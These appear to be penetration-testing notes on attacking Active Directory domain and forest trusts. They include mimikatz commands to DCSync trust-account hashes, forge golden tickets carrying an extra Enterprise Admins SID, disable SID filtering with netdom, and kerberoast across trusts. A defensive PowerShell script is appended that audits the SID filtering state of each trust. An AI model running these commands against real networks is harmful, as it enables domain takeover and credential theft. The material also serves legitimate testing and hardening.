Domain Trust
PowerShell Get-DomainTrust -Domain other.domain
(xct) > Assembly SharpHound3 "-c All -D other.domain"
(xct) > Rubeus kerberoast /domain:other.domain
Enumerate
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Get-DomainTrust -API //PowerView
When a trust is created, the computer accounts domain1$ and domain2$ are created in the respective domains (trust accounts). The shared secret of the two domains is the password hash of these accounts. It can be dumped as DA in one domain (and used for the following steps instead of the krbtgt hash if we cannot get our hands on that one):
lsadump::dcsync /domain:prod.corp1.com /user:domain1$
1. Gather both domains' SIDs:
Get-DomainSID -Domain domain1
Get-DomainSID -Domain domain2
2. Craft a golden ticket that carries the other domain's Enterprise Admins SID (RID 519) as an extra SID to obtain Enterprise Admin privileges:
kerberos::golden /user:<user> /domain:<domain1> /sid:<domain1-sid> /krbtgt:<krbtgt-domain1> /sids:<domain2-sid>-519 /ptt
Across forests, extra SIDs are filtered (SID filtering). This can however be disabled on the DC (the intended use is during corporate mergers etc.):
netdom trust <domain2> /d:corp1.com /enablesidhistory:yes
Despite enabling this, we would still get access denied, because SIDs with a RID < 1000 are always filtered. In addition, members of global security groups are filtered as well. So we need to find a SID with RID > 1000 that carries privileges useful to us (if it is a group, it must also not be a member of a global security group).
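From the defender's side, the trust configuration that decides whether such extra SIDs are honoured is stored in the trustAttributes bits of each trust object. The following audit script is an added example (not part of the original notes) that lists every trust of the current domain and classifies its SID filtering state; it assumes the RSAT ActiveDirectory module and a domain account with read access to the trust objects.

```powershell
# Added audit example: list trusts of the current domain and flag the ones
# whose SID filtering has been relaxed, i.e. where a ticket carrying an extra
# SID from the trusted domain would be accepted by the trusting domain.
Import-Module ActiveDirectory

# Relevant trustAttributes bits (MS-ADTS trustAttributes)
$TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x04   # external trust with SID filtering on
$TRUST_ATTRIBUTE_FOREST_TRANSITIVE  = 0x08   # forest trust
$TRUST_ATTRIBUTE_WITHIN_FOREST      = 0x20   # intra-forest trust: never filtered
$TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL  = 0x40   # forest trust after /enablesidhistory:yes

function Get-TrustSidFilteringState {
    param([int]$Attributes)
    if ($Attributes -band $TRUST_ATTRIBUTE_WITHIN_FOREST) {
        return 'Intra-forest: no SID filtering, extra SIDs are honoured'
    }
    if ($Attributes -band $TRUST_ATTRIBUTE_FOREST_TRANSITIVE) {
        if ($Attributes -band $TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL) {
            return 'Forest trust: SID history ENABLED, only RID < 1000 filtered'
        }
        return 'Forest trust: SID filtering active (default)'
    }
    if ($Attributes -band $TRUST_ATTRIBUTE_QUARANTINED_DOMAIN) {
        return 'External trust: quarantined, SID filtering active (default)'
    }
    return 'External trust: SID filtering DISABLED (/quarantine:no)'
}

# Emit one row per trust; review every row that is not marked "active".
Get-ADTrust -Filter * | ForEach-Object {
    [pscustomobject]@{
        Target     = $_.Target
        Direction  = $_.Direction
        Attributes = ('0x{0:X}' -f $_.TrustAttributes)
        SidFilter  = Get-TrustSidFilteringState -Attributes $_.TrustAttributes
    }
} | Format-Table -AutoSize
```

Re-running this after a change made with netdom shows the TREAT_AS_EXTERNAL or QUARANTINED_DOMAIN bit flip, which is the state a trust should be returned to once the migration that required it is over.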